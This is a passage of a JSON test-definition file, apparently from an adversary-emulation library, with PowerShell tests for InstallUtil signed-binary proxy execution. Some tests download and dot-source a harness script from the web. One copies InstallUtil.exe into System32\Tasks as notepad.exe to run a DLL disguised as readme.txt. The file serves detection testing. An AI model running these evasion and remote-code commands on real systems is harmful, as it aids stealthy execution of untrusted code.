\"$([System.Runtime.InteropServices.RuntimeEnvironment]::GetRuntimeDirectory())InstallUtil.exe\" -Destination \"$Env:windir\\System32\\Tasks\\notepad.exe\"\n\n$TestArgs = @{\n OutputAssemblyDirectory = $InstallerAssemblyDir\n OutputAssemblyFileName = $InstallerAssemblyFileName\n InvocationMethod = 'Executable'\n CommandLine = $CommandLine\n InstallUtilPath = \"$Env:windir\\System32\\Tasks\\notepad.exe\"\n}\n\n$ActualOutput = Invoke-BuildAndInvokeInstallUtilAssembly @TestArgs -MinimumViableAssembly\n\nif ($ActualOutput -ne $ExpectedOutput) {\n throw @\"\nEvasive Installutil invocation test failure. Installer assembly execution output did not match the expected output.\nExpected: $ExpectedOutput\nActual: $ActualOutput\n\"@\n}\n" + "# Import the required test harness function, Invoke-BuildAndInvokeInstallUtilAssembly\n. \"\\T1218.004\\src\\InstallUtilTestHarness.ps1\"\n\n$InstallerAssemblyDir = \"$Env:TEMP\\\"\n$InstallerAssemblyFileName = \"T1218.004.dll\"\n$InstallerAssemblyFullPath = Join-Path -Path $InstallerAssemblyDir -ChildPath $InstallerAssemblyFileName\n\n$ExpectedOutput = 'Constructor_'\n\n$TestArgs = @{\n OutputAssemblyDirectory = $InstallerAssemblyDir\n OutputAssemblyFileName = $InstallerAssemblyFileName\n InvocationMethod = 'CheckIfInstallable'\n}\n\n$ActualOutput = Invoke-BuildAndInvokeInstallUtilAssembly @TestArgs -MinimumViableAssembly\n\nif ($ActualOutput -ne $ExpectedOutput) {\n throw @\"\nCheckIfInstallable method execution test failure. Installer assembly execution output did not match the expected output.\nExpected: $ExpectedOutput\nActual: $ActualOutput\n\"@\n}\n", + "# Import the required test harness function, Invoke-BuildAndInvokeInstallUtilAssembly\n. \"\\T1218.004\\src\\InstallUtilTestHarness.ps1\"\n\n$InstallerAssemblyDir = \"$Env:TEMP\\\"\n$InstallerAssemblyFileName = \"T1218.004.dll\"\n$InstallerAssemblyFullPath = Join-Path -Path $InstallerAssemblyDir -ChildPath $InstallerAssemblyFileName\n\n$CommandLine = \"/logfile= /logtoconsole=false `\"$InstallerAssemblyFullPath`\"\"\n$ExpectedOutput = 'Constructor_'\n\n$TestArgs = @{\n OutputAssemblyDirectory = $InstallerAssemblyDir\n OutputAssemblyFileName = $InstallerAssemblyFileName\n InvocationMethod = 'InstallHelper'\n CommandLine = $CommandLine\n}\n\n$ActualOutput = Invoke-BuildAndInvokeInstallUtilAssembly @TestArgs -MinimumViableAssembly\n\nif ($ActualOutput -ne $ExpectedOutput) {\n throw @\"\nInstallHelper method execution test failure. Installer assembly execution output did not match the expected output.\nExpected: $ExpectedOutput\nActual: $ActualOutput\n\"@\n}\n", + "# Import the required test harness function, Invoke-BuildAndInvokeInstallUtilAssembly\n. \"\\T1218.004\\src\\InstallUtilTestHarness.ps1\"\n\n$InstallerAssemblyDir = \"$Env:TEMP\\\"\n$InstallerAssemblyFileName = \"T1218.004.dll\"\n$InstallerAssemblyFullPath = Join-Path -Path $InstallerAssemblyDir -ChildPath $InstallerAssemblyFileName\n\n$CommandLine = \"/logfile= /logtoconsole=false `\"$InstallerAssemblyFullPath`\"\"\n$ExpectedOutput = 'Constructor_'\n\n$TestArgs = @{\n OutputAssemblyDirectory = $InstallerAssemblyDir\n OutputAssemblyFileName = $InstallerAssemblyFileName\n InvocationMethod = 'Executable'\n CommandLine = $CommandLine\n}\n\n$ActualOutput = Invoke-BuildAndInvokeInstallUtilAssembly @TestArgs -MinimumViableAssembly\n\nif ($ActualOutput -ne $ExpectedOutput) {\n throw @\"\nInstallUtil class constructor execution test failure. Installer assembly execution output did not match the expected output.\nExpected: $ExpectedOutput\nActual: $ActualOutput\n\"@\n}\n", + "# Import the required test harness function, Invoke-BuildAndInvokeInstallUtilAssembly\n. \"\\T1218.004\\src\\InstallUtilTestHarness.ps1\"\n\n$InstallerAssemblyDir = \"$Env:TEMP\\\"\n$InstallerAssemblyFileName = \"T1218.004.dll\"\n$InstallerAssemblyFullPath = Join-Path -Path $InstallerAssemblyDir -ChildPath $InstallerAssemblyFileName\n\n$CommandLine = \"/logfile= /logtoconsole=false /installtype=notransaction /action=install `\"$InstallerAssemblyFullPath`\"\"\n$ExpectedOutput = 'Constructor_Install_'\n\n$TestArgs = @{\n OutputAssemblyDirectory = $InstallerAssemblyDir\n OutputAssemblyFileName = $InstallerAssemblyFileName\n InvocationMethod = 'Executable'\n CommandLine = $CommandLine\n}\n\n$ActualOutput = Invoke-BuildAndInvokeInstallUtilAssembly @TestArgs\n\nif ($ActualOutput -ne $ExpectedOutput) {\n throw @\"\nInstallUtil Install method execution test failure. Installer assembly execution output did not match the expected output.\nExpected: $ExpectedOutput\nActual: $ActualOutput\n\"@\n}\n", + "# Import the required test harness function, Invoke-BuildAndInvokeInstallUtilAssembly\n. \"\\T1218.004\\src\\InstallUtilTestHarness.ps1\"\n\n$InstallerAssemblyDir = \"$Env:TEMP\\\"\n$InstallerAssemblyFileName = \"T1218.004.dll\"\n$InstallerAssemblyFullPath = Join-Path -Path $InstallerAssemblyDir -ChildPath $InstallerAssemblyFileName\n\n$CommandLine = \"/logfile= /logtoconsole=false /U `\"$InstallerAssemblyFullPath`\"\"\n$ExpectedOutput = 'Constructor_Uninstall_'\n\n$TestArgs = @{\n OutputAssemblyDirectory = $InstallerAssemblyDir\n OutputAssemblyFileName = $InstallerAssemblyFileName\n InvocationMethod = 'Executable'\n CommandLine = $CommandLine\n}\n\n$ActualOutput = Invoke-BuildAndInvokeInstallUtilAssembly @TestArgs\n\nif ($ActualOutput -ne $ExpectedOutput) {\n throw @\"\nInstallUtil Uninstall method execution test failure. Installer assembly execution output did not match the expected output.\nExpected: $ExpectedOutput\nActual: $ActualOutput\n\"@\n}\n", + "# Import the required test harness function, Invoke-BuildAndInvokeInstallUtilAssembly\n. \"\\T1218.004\\src\\InstallUtilTestHarness.ps1\"\n\n$InstallerAssemblyDir = \"$Env:TEMP\\\"\n$InstallerAssemblyFileName = \"T1218.004.dll\"\n$InstallerAssemblyFullPath = Join-Path -Path $InstallerAssemblyDir -ChildPath $InstallerAssemblyFileName\n\n$CommandLine = \"/logfile= /logtoconsole=false /installtype=notransaction /action=uninstall `\"$InstallerAssemblyFullPath`\"\"\n$ExpectedOutput = 'Constructor_Uninstall_'\n\n$TestArgs = @{\n OutputAssemblyDirectory = $InstallerAssemblyDir\n OutputAssemblyFileName = $InstallerAssemblyFileName\n InvocationMethod = 'Executable'\n CommandLine = $CommandLine\n}\n\n$ActualOutput = Invoke-BuildAndInvokeInstallUtilAssembly @TestArgs\n\nif ($ActualOutput -ne $ExpectedOutput) {\n throw @\"\nInstallUtil Uninstall method execution test failure. Installer assembly execution output did not match the expected output.\nExpected: $ExpectedOutput\nActual: $ActualOutput\n\"@\n}\n", + "# Import the required test harness function, Invoke-BuildAndInvokeInstallUtilAssembly\n. \"\\T1218.004\\src\\InstallUtilTestHarness.ps1\"\n\n$InstallerAssemblyDir = \"$Env:TEMP\\\"\n$InstallerAssemblyFileName = \"T1218.004.dll\"\n$InstallerAssemblyFullPath = Join-Path -Path $InstallerAssemblyDir -ChildPath $InstallerAssemblyFileName\n\n$CommandLine = \"/? `\"$InstallerAssemblyFullPath`\"\"\n$ExpectedOutput = 'Constructor_HelpText_'\n\n$TestArgs = @{\n OutputAssemblyDirectory = $InstallerAssemblyDir\n OutputAssemblyFileName = $InstallerAssemblyFileName\n InvocationMethod = 'Executable'\n CommandLine = $CommandLine\n}\n\n$ActualOutput = Invoke-BuildAndInvokeInstallUtilAssembly @TestArgs\n\nif ($ActualOutput -ne $ExpectedOutput) {\n throw @\"\nInstallUtil HelpText property execution test failure. Installer assembly execution output did not match the expected output.\nExpected: $ExpectedOutput\nActual: $ActualOutput\n\"@\n}\n", + "# Import the required test harness function, Invoke-BuildAndInvokeInstallUtilAssembly\n. \"\\T1218.004\\src\\InstallUtilTestHarness.ps1\"\n\n$InstallerAssemblyDir = \"$Env:windir\\System32\\Tasks\"\n$InstallerAssemblyFileName = 'readme.txt'\n$InstallerAssemblyFullPath = Join-Path -Path $InstallerAssemblyDir -ChildPath $InstallerAssemblyFileName\n\n$CommandLine = \"readme.txt\"\n$ExpectedOutput = 'Constructor_'\n\n# Explicitly set the directory so that a relative path to readme.txt can be supplied.\nSet-Location \"$Env:windir\\System32\\Tasks\"\n\nCopy-Item -Path \"$([System.Runtime.InteropServices.RuntimeEnvironment]::GetRuntimeDirectory())InstallUtil.exe\" -Destination \"$Env:windir\\System32\\Tasks\\notepad.exe\"\n\n$TestArgs = @{\n OutputAssemblyDirectory = $InstallerAssemblyDir\n OutputAssemblyFileName = $InstallerAssemblyFileName\n InvocationMethod = 'Executable'\n CommandLine = $CommandLine\n InstallUtilPath = \"$Env:windir\\System32\\Tasks\\notepad.exe\"\n}\n\n$ActualOutput = Invoke-BuildAndInvokeInstallUtilAssembly @TestArgs -MinimumViableAssembly\n\nif ($ActualOutput -ne $ExpectedOutput) {\n throw @\"\nEvasive Installutil invocation test failure. Installer assembly execution output did not match the expected output.\nExpected: $ExpectedOutput\nActual: $ActualOutput\n\"@\n}\n" ], "commands": [], "queries": [], @@ -189871,11 +191758,11 @@ { "description": "InstallUtil test harness script must be installed at specified location (#{test_harness})\n", "prereq_command": "if (Test-Path \"#{test_harness}\") {exit 0} else {exit 1}\n", - "get_prereq_command": "New-Item -Type Directory (split-path #{test_harness}) -ErrorAction ignore | Out-Null\nInvoke-WebRequest 'https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.004/src/InstallUtilTestHarness.ps1' -OutFile \"#{test_harness}\"\n" + "get_prereq_command": "New-Item -Type Directory (split-path \"#{test_harness}\") -ErrorAction ignore | Out-Null\nInvoke-WebRequest 'https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.004/src/InstallUtilTestHarness.ps1' -OutFile \"#{test_harness}\"\n" } ], "executor": { - "command": "# Import the required test harness function, Invoke-BuildAndInvokeInstallUtilAssembly\n. #{test_harness}\n\n$InstallerAssemblyDir = \"#{assembly_dir}\"\n$InstallerAssemblyFileName = \"#{assembly_filename}\"\n$InstallerAssemblyFullPath = Join-Path -Path $InstallerAssemblyDir -ChildPath $InstallerAssemblyFileName\n\n$ExpectedOutput = 'Constructor_'\n\n$TestArgs = @{\n OutputAssemblyDirectory = $InstallerAssemblyDir\n OutputAssemblyFileName = $InstallerAssemblyFileName\n InvocationMethod = '#{invocation_method}'\n}\n\n$ActualOutput = Invoke-BuildAndInvokeInstallUtilAssembly @TestArgs -MinimumViableAssembly\n\nif ($ActualOutput -ne $ExpectedOutput) {\n throw @\"\nCheckIfInstallable method execution test failure. Installer assembly execution output did not match the expected output.\nExpected: $ExpectedOutput\nActual: $ActualOutput\n\"@\n}\n", + "command": "# Import the required test harness function, Invoke-BuildAndInvokeInstallUtilAssembly\n. \"#{test_harness}\"\n\n$InstallerAssemblyDir = \"#{assembly_dir}\"\n$InstallerAssemblyFileName = \"#{assembly_filename}\"\n$InstallerAssemblyFullPath = Join-Path -Path $InstallerAssemblyDir -ChildPath $InstallerAssemblyFileName\n\n$ExpectedOutput = 'Constructor_'\n\n$TestArgs = @{\n OutputAssemblyDirectory = $InstallerAssemblyDir\n OutputAssemblyFileName = $InstallerAssemblyFileName\n InvocationMethod = '#{invocation_method}'\n}\n\n$ActualOutput = Invoke-BuildAndInvokeInstallUtilAssembly @TestArgs -MinimumViableAssembly\n\nif ($ActualOutput -ne $ExpectedOutput) {\n throw @\"\nCheckIfInstallable method execution test failure. Installer assembly execution output did not match the expected output.\nExpected: $ExpectedOutput\nActual: $ActualOutput\n\"@\n}\n", "cleanup_command": "$InstallerAssemblyDir = \"#{assembly_dir}\"\n$InstallerAssemblyFileName = \"#{assembly_filename}\"\n$InstallerAssemblyFullPath = Join-Path -Path $InstallerAssemblyDir -ChildPath $InstallerAssemblyFileName\nRemove-Item -Path $InstallerAssemblyFullPath -ErrorAction Ignore\n", "name": "powershell" } @@ -189913,11 +191800,11 @@ { "description": "InstallUtil test harness script must be installed at specified location (#{test_harness})\n", "prereq_command": "if (Test-Path \"#{test_harness}\") {exit 0} else {exit 1}\n", - "get_prereq_command": "New-Item -Type Directory (split-path #{test_harness}) -ErrorAction ignore | Out-Null\nInvoke-WebRequest 'https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.004/src/InstallUtilTestHarness.ps1' -OutFile \"#{test_harness}\"\n" + "get_prereq_command": "New-Item -Type Directory (split-path \"#{test_harness}\") -ErrorAction ignore | Out-Null\nInvoke-WebRequest 'https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.004/src/InstallUtilTestHarness.ps1' -OutFile \"#{test_harness}\"\n" } ], "executor": { - "command": "# Import the required test harness function, Invoke-BuildAndInvokeInstallUtilAssembly\n. #{test_harness}\n\n$InstallerAssemblyDir = \"#{assembly_dir}\"\n$InstallerAssemblyFileName = \"#{assembly_filename}\"\n$InstallerAssemblyFullPath = Join-Path -Path $InstallerAssemblyDir -ChildPath $InstallerAssemblyFileName\n\n$CommandLine = \"/logfile= /logtoconsole=false `\"$InstallerAssemblyFullPath`\"\"\n$ExpectedOutput = 'Constructor_'\n\n$TestArgs = @{\n OutputAssemblyDirectory = $InstallerAssemblyDir\n OutputAssemblyFileName = $InstallerAssemblyFileName\n InvocationMethod = '#{invocation_method}'\n CommandLine = $CommandLine\n}\n\n$ActualOutput = Invoke-BuildAndInvokeInstallUtilAssembly @TestArgs -MinimumViableAssembly\n\nif ($ActualOutput -ne $ExpectedOutput) {\n throw @\"\nInstallHelper method execution test failure. Installer assembly execution output did not match the expected output.\nExpected: $ExpectedOutput\nActual: $ActualOutput\n\"@\n}\n", + "command": "# Import the required test harness function, Invoke-BuildAndInvokeInstallUtilAssembly\n. \"#{test_harness}\"\n\n$InstallerAssemblyDir = \"#{assembly_dir}\"\n$InstallerAssemblyFileName = \"#{assembly_filename}\"\n$InstallerAssemblyFullPath = Join-Path -Path $InstallerAssemblyDir -ChildPath $InstallerAssemblyFileName\n\n$CommandLine = \"/logfile= /logtoconsole=false `\"$InstallerAssemblyFullPath`\"\"\n$ExpectedOutput = 'Constructor_'\n\n$TestArgs = @{\n OutputAssemblyDirectory = $InstallerAssemblyDir\n OutputAssemblyFileName = $InstallerAssemblyFileName\n InvocationMethod = '#{invocation_method}'\n CommandLine = $CommandLine\n}\n\n$ActualOutput = Invoke-BuildAndInvokeInstallUtilAssembly @TestArgs -MinimumViableAssembly\n\nif ($ActualOutput -ne $ExpectedOutput) {\n throw @\"\nInstallHelper method execution test failure. Installer assembly execution output did not match the expected output.\nExpected: $ExpectedOutput\nActual: $ActualOutput\n\"@\n}\n", "cleanup_command": "$InstallerAssemblyDir = \"#{assembly_dir}\"\n$InstallerAssemblyFileName = \"#{assembly_filename}\"\n$InstallerAssemblyFullPath = Join-Path -Path $InstallerAssemblyDir -ChildPath $InstallerAssemblyFileName\nRemove-Item -Path $InstallerAssemblyFullPath -ErrorAction Ignore\n", "name": "powershell" } @@ -189955,11 +191842,11 @@ { "description": "InstallUtil test harness script must be installed at specified location (#{test_harness})\n", "prereq_command": "if (Test-Path \"#{test_harness}\") {exit 0} else {exit 1}\n", - "get_prereq_command": "New-Item -Type Directory (split-path #{test_harness}) -ErrorAction ignore | Out-Null\nInvoke-WebRequest 'https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.004/src/InstallUtilTestHarness.ps1' -OutFile \"#{test_harness}\"\n" + "get_prereq_command": "New-Item -Type Directory (split-path \"#{test_harness}\") -ErrorAction ignore | Out-Null\nInvoke-WebRequest 'https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.004/src/InstallUtilTestHarness.ps1' -OutFile \"#{test_harness}\"\n" } ], "executor": { - "command": "# Import the required test harness function, Invoke-BuildAndInvokeInstallUtilAssembly\n. #{test_harness}\n\n$InstallerAssemblyDir = \"#{assembly_dir}\"\n$InstallerAssemblyFileName = \"#{assembly_filename}\"\n$InstallerAssemblyFullPath = Join-Path -Path $InstallerAssemblyDir -ChildPath $InstallerAssemblyFileName\n\n$CommandLine = \"/logfile= /logtoconsole=false `\"$InstallerAssemblyFullPath`\"\"\n$ExpectedOutput = 'Constructor_'\n\n$TestArgs = @{\n OutputAssemblyDirectory = $InstallerAssemblyDir\n OutputAssemblyFileName = $InstallerAssemblyFileName\n InvocationMethod = '#{invocation_method}'\n CommandLine = $CommandLine\n}\n\n$ActualOutput = Invoke-BuildAndInvokeInstallUtilAssembly @TestArgs -MinimumViableAssembly\n\nif ($ActualOutput -ne $ExpectedOutput) {\n throw @\"\nInstallUtil class constructor execution test failure. Installer assembly execution output did not match the expected output.\nExpected: $ExpectedOutput\nActual: $ActualOutput\n\"@\n}\n", + "command": "# Import the required test harness function, Invoke-BuildAndInvokeInstallUtilAssembly\n. \"#{test_harness}\"\n\n$InstallerAssemblyDir = \"#{assembly_dir}\"\n$InstallerAssemblyFileName = \"#{assembly_filename}\"\n$InstallerAssemblyFullPath = Join-Path -Path $InstallerAssemblyDir -ChildPath $InstallerAssemblyFileName\n\n$CommandLine = \"/logfile= /logtoconsole=false `\"$InstallerAssemblyFullPath`\"\"\n$ExpectedOutput = 'Constructor_'\n\n$TestArgs = @{\n OutputAssemblyDirectory = $InstallerAssemblyDir\n OutputAssemblyFileName = $InstallerAssemblyFileName\n InvocationMethod = '#{invocation_method}'\n CommandLine = $CommandLine\n}\n\n$ActualOutput = Invoke-BuildAndInvokeInstallUtilAssembly @TestArgs -MinimumViableAssembly\n\nif ($ActualOutput -ne $ExpectedOutput) {\n throw @\"\nInstallUtil class constructor execution test failure. Installer assembly execution output did not match the expected output.\nExpected: $ExpectedOutput\nActual: $ActualOutput\n\"@\n}\n", "cleanup_command": "$InstallerAssemblyDir = \"#{assembly_dir}\"\n$InstallerAssemblyFileName = \"#{assembly_filename}\"\n$InstallerAssemblyFullPath = Join-Path -Path $InstallerAssemblyDir -ChildPath $InstallerAssemblyFileName\nRemove-Item -Path $InstallerAssemblyFullPath -ErrorAction Ignore\n", "name": "powershell" } @@ -189997,11 +191884,11 @@ { "description": "InstallUtil test harness script must be installed at specified location (#{test_harness})\n", "prereq_command": "if (Test-Path \"#{test_harness}\") {exit 0} else {exit 1}\n", - "get_prereq_command": "New-Item -Type Directory (split-path #{test_harness}) -ErrorAction ignore | Out-Null\nInvoke-WebRequest 'https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.004/src/InstallUtilTestHarness.ps1' -OutFile \"#{test_harness}\"\n" + "get_prereq_command": "New-Item -Type Directory (split-path \"#{test_harness}\") -ErrorAction ignore | Out-Null\nInvoke-WebRequest 'https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.004/src/InstallUtilTestHarness.ps1' -OutFile \"#{test_harness}\"\n" } ], "executor": { - "command": "# Import the required test harness function, Invoke-BuildAndInvokeInstallUtilAssembly\n. #{test_harness}\n\n$InstallerAssemblyDir = \"#{assembly_dir}\"\n$InstallerAssemblyFileName = \"#{assembly_filename}\"\n$InstallerAssemblyFullPath = Join-Path -Path $InstallerAssemblyDir -ChildPath $InstallerAssemblyFileName\n\n$CommandLine = \"/logfile= /logtoconsole=false /installtype=notransaction /action=install `\"$InstallerAssemblyFullPath`\"\"\n$ExpectedOutput = 'Constructor_Install_'\n\n$TestArgs = @{\n OutputAssemblyDirectory = $InstallerAssemblyDir\n OutputAssemblyFileName = $InstallerAssemblyFileName\n InvocationMethod = '#{invocation_method}'\n CommandLine = $CommandLine\n}\n\n$ActualOutput = Invoke-BuildAndInvokeInstallUtilAssembly @TestArgs\n\nif ($ActualOutput -ne $ExpectedOutput) {\n throw @\"\nInstallUtil Install method execution test failure. Installer assembly execution output did not match the expected output.\nExpected: $ExpectedOutput\nActual: $ActualOutput\n\"@\n}\n", + "command": "# Import the required test harness function, Invoke-BuildAndInvokeInstallUtilAssembly\n. \"#{test_harness}\"\n\n$InstallerAssemblyDir = \"#{assembly_dir}\"\n$InstallerAssemblyFileName = \"#{assembly_filename}\"\n$InstallerAssemblyFullPath = Join-Path -Path $InstallerAssemblyDir -ChildPath $InstallerAssemblyFileName\n\n$CommandLine = \"/logfile= /logtoconsole=false /installtype=notransaction /action=install `\"$InstallerAssemblyFullPath`\"\"\n$ExpectedOutput = 'Constructor_Install_'\n\n$TestArgs = @{\n OutputAssemblyDirectory = $InstallerAssemblyDir\n OutputAssemblyFileName = $InstallerAssemblyFileName\n InvocationMethod = '#{invocation_method}'\n CommandLine = $CommandLine\n}\n\n$ActualOutput = Invoke-BuildAndInvokeInstallUtilAssembly @TestArgs\n\nif ($ActualOutput -ne $ExpectedOutput) {\n throw @\"\nInstallUtil Install method execution test failure. Installer assembly execution output did not match the expected output.\nExpected: $ExpectedOutput\nActual: $ActualOutput\n\"@\n}\n", "cleanup_command": "$InstallerAssemblyDir = \"#{assembly_dir}\"\n$InstallerAssemblyFileName = \"#{assembly_filename}\"\n$InstallerAssemblyFullPath = Join-Path -Path $InstallerAssemblyDir -ChildPath $InstallerAssemblyFileName\nRemove-Item -Path $InstallerAssemblyFullPath -ErrorAction Ignore\n", "name": "powershell" } @@ -190039,11 +191926,11 @@ { "description": "InstallUtil test harness script must be installed at specified location (#{test_harness})\n", "prereq_command": "if (Test-Path \"#{test_harness}\") {exit 0} else {exit 1}\n", - "get_prereq_command": "New-Item -Type Directory (split-path #{test_harness}) -ErrorAction ignore | Out-Null\nInvoke-WebRequest 'https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.004/src/InstallUtilTestHarness.ps1' -OutFile \"#{test_harness}\"\n" + "get_prereq_command": "New-Item -Type Directory (split-path \"#{test_harness}\") -ErrorAction ignore | Out-Null\nInvoke-WebRequest 'https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.004/src/InstallUtilTestHarness.ps1' -OutFile \"#{test_harness}\"\n" } ], "executor": { - "command": "# Import the required test harness function, Invoke-BuildAndInvokeInstallUtilAssembly\n. #{test_harness}\n\n$InstallerAssemblyDir = \"#{assembly_dir}\"\n$InstallerAssemblyFileName = \"#{assembly_filename}\"\n$InstallerAssemblyFullPath = Join-Path -Path $InstallerAssemblyDir -ChildPath $InstallerAssemblyFileName\n\n$CommandLine = \"/logfile= /logtoconsole=false /U `\"$InstallerAssemblyFullPath`\"\"\n$ExpectedOutput = 'Constructor_Uninstall_'\n\n$TestArgs = @{\n OutputAssemblyDirectory = $InstallerAssemblyDir\n OutputAssemblyFileName = $InstallerAssemblyFileName\n InvocationMethod = '#{invocation_method}'\n CommandLine = $CommandLine\n}\n\n$ActualOutput = Invoke-BuildAndInvokeInstallUtilAssembly @TestArgs\n\nif ($ActualOutput -ne $ExpectedOutput) {\n throw @\"\nInstallUtil Uninstall method execution test failure. Installer assembly execution output did not match the expected output.\nExpected: $ExpectedOutput\nActual: $ActualOutput\n\"@\n}\n", + "command": "# Import the required test harness function, Invoke-BuildAndInvokeInstallUtilAssembly\n. \"#{test_harness}\"\n\n$InstallerAssemblyDir = \"#{assembly_dir}\"\n$InstallerAssemblyFileName = \"#{assembly_filename}\"\n$InstallerAssemblyFullPath = Join-Path -Path $InstallerAssemblyDir -ChildPath $InstallerAssemblyFileName\n\n$CommandLine = \"/logfile= /logtoconsole=false /U `\"$InstallerAssemblyFullPath`\"\"\n$ExpectedOutput = 'Constructor_Uninstall_'\n\n$TestArgs = @{\n OutputAssemblyDirectory = $InstallerAssemblyDir\n OutputAssemblyFileName = $InstallerAssemblyFileName\n InvocationMethod = '#{invocation_method}'\n CommandLine = $CommandLine\n}\n\n$ActualOutput = Invoke-BuildAndInvokeInstallUtilAssembly @TestArgs\n\nif ($ActualOutput -ne $ExpectedOutput) {\n throw @\"\nInstallUtil Uninstall method execution test failure. Installer assembly execution output did not match the expected output.\nExpected: $ExpectedOutput\nActual: $ActualOutput\n\"@\n}\n", "cleanup_command": "$InstallerAssemblyDir = \"#{assembly_dir}\"\n$InstallerAssemblyFileName = \"#{assembly_filename}\"\n$InstallerAssemblyFullPath = Join-Path -Path $InstallerAssemblyDir -ChildPath $InstallerAssemblyFileName\nRemove-Item -Path $InstallerAssemblyFullPath -ErrorAction Ignore\n", "name": "powershell" } @@ -190081,11 +191968,11 @@ { "description": "InstallUtil test harness script must be installed at specified location (#{test_harness})\n", "prereq_command": "if (Test-Path \"#{test_harness}\") {exit 0} else {exit 1}\n", - "get_prereq_command": "New-Item -Type Directory (split-path #{test_harness}) -ErrorAction ignore | Out-Null\nInvoke-WebRequest 'https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.004/src/InstallUtilTestHarness.ps1' -OutFile \"#{test_harness}\"\n" + "get_prereq_command": "New-Item -Type Directory (split-path \"#{test_harness}\") -ErrorAction ignore | Out-Null\nInvoke-WebRequest 'https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.004/src/InstallUtilTestHarness.ps1' -OutFile \"#{test_harness}\"\n" } ], "executor": { - "command": "# Import the required test harness function, Invoke-BuildAndInvokeInstallUtilAssembly\n. #{test_harness}\n\n$InstallerAssemblyDir = \"#{assembly_dir}\"\n$InstallerAssemblyFileName = \"#{assembly_filename}\"\n$InstallerAssemblyFullPath = Join-Path -Path $InstallerAssemblyDir -ChildPath $InstallerAssemblyFileName\n\n$CommandLine = \"/logfile= /logtoconsole=false /installtype=notransaction /action=uninstall `\"$InstallerAssemblyFullPath`\"\"\n$ExpectedOutput = 'Constructor_Uninstall_'\n\n$TestArgs = @{\n OutputAssemblyDirectory = $InstallerAssemblyDir\n OutputAssemblyFileName = $InstallerAssemblyFileName\n InvocationMethod = '#{invocation_method}'\n CommandLine = $CommandLine\n}\n\n$ActualOutput = Invoke-BuildAndInvokeInstallUtilAssembly @TestArgs\n\nif ($ActualOutput -ne $ExpectedOutput) {\n throw @\"\nInstallUtil Uninstall method execution test failure. Installer assembly execution output did not match the expected output.\nExpected: $ExpectedOutput\nActual: $ActualOutput\n\"@\n}\n", + "command": "# Import the required test harness function, Invoke-BuildAndInvokeInstallUtilAssembly\n. \"#{test_harness}\"\n\n$InstallerAssemblyDir = \"#{assembly_dir}\"\n$InstallerAssemblyFileName = \"#{assembly_filename}\"\n$InstallerAssemblyFullPath = Join-Path -Path $InstallerAssemblyDir -ChildPath $InstallerAssemblyFileName\n\n$CommandLine = \"/logfile= /logtoconsole=false /installtype=notransaction /action=uninstall `\"$InstallerAssemblyFullPath`\"\"\n$ExpectedOutput = 'Constructor_Uninstall_'\n\n$TestArgs = @{\n OutputAssemblyDirectory = $InstallerAssemblyDir\n OutputAssemblyFileName = $InstallerAssemblyFileName\n InvocationMethod = '#{invocation_method}'\n CommandLine = $CommandLine\n}\n\n$ActualOutput = Invoke-BuildAndInvokeInstallUtilAssembly @TestArgs\n\nif ($ActualOutput -ne $ExpectedOutput) {\n throw @\"\nInstallUtil Uninstall method execution test failure. Installer assembly execution output did not match the expected output.\nExpected: $ExpectedOutput\nActual: $ActualOutput\n\"@\n}\n", "cleanup_command": "$InstallerAssemblyDir = \"#{assembly_dir}\"\n$InstallerAssemblyFileName = \"#{assembly_filename}\"\n$InstallerAssemblyFullPath = Join-Path -Path $InstallerAssemblyDir -ChildPath $InstallerAssemblyFileName\nRemove-Item -Path $InstallerAssemblyFullPath -ErrorAction Ignore\n", "name": "powershell" } @@ -190123,11 +192010,11 @@ { "description": "InstallUtil test harness script must be installed at specified location (#{test_harness})\n", "prereq_command": "if (Test-Path \"#{test_harness}\") {exit 0} else {exit 1}\n", - "get_prereq_command": "New-Item -Type Directory (split-path #{test_harness}) -ErrorAction ignore | Out-Null\nInvoke-WebRequest 'https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.004/src/InstallUtilTestHarness.ps1' -OutFile \"#{test_harness}\"\n" + "get_prereq_command": "New-Item -Type Directory (split-path \"#{test_harness}\") -ErrorAction ignore | Out-Null\nInvoke-WebRequest 'https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.004/src/InstallUtilTestHarness.ps1' -OutFile \"#{test_harness}\"\n" } ], "executor": { - "command": "# Import the required test harness function, Invoke-BuildAndInvokeInstallUtilAssembly\n. #{test_harness}\n\n$InstallerAssemblyDir = \"#{assembly_dir}\"\n$InstallerAssemblyFileName = \"#{assembly_filename}\"\n$InstallerAssemblyFullPath = Join-Path -Path $InstallerAssemblyDir -ChildPath $InstallerAssemblyFileName\n\n$CommandLine = \"/? `\"$InstallerAssemblyFullPath`\"\"\n$ExpectedOutput = 'Constructor_HelpText_'\n\n$TestArgs = @{\n OutputAssemblyDirectory = $InstallerAssemblyDir\n OutputAssemblyFileName = $InstallerAssemblyFileName\n InvocationMethod = '#{invocation_method}'\n CommandLine = $CommandLine\n}\n\n$ActualOutput = Invoke-BuildAndInvokeInstallUtilAssembly @TestArgs\n\nif ($ActualOutput -ne $ExpectedOutput) {\n throw @\"\nInstallUtil HelpText property execution test failure. Installer assembly execution output did not match the expected output.\nExpected: $ExpectedOutput\nActual: $ActualOutput\n\"@\n}\n", + "command": "# Import the required test harness function, Invoke-BuildAndInvokeInstallUtilAssembly\n. \"#{test_harness}\"\n\n$InstallerAssemblyDir = \"#{assembly_dir}\"\n$InstallerAssemblyFileName = \"#{assembly_filename}\"\n$InstallerAssemblyFullPath = Join-Path -Path $InstallerAssemblyDir -ChildPath $InstallerAssemblyFileName\n\n$CommandLine = \"/? `\"$InstallerAssemblyFullPath`\"\"\n$ExpectedOutput = 'Constructor_HelpText_'\n\n$TestArgs = @{\n OutputAssemblyDirectory = $InstallerAssemblyDir\n OutputAssemblyFileName = $InstallerAssemblyFileName\n InvocationMethod = '#{invocation_method}'\n CommandLine = $CommandLine\n}\n\n$ActualOutput = 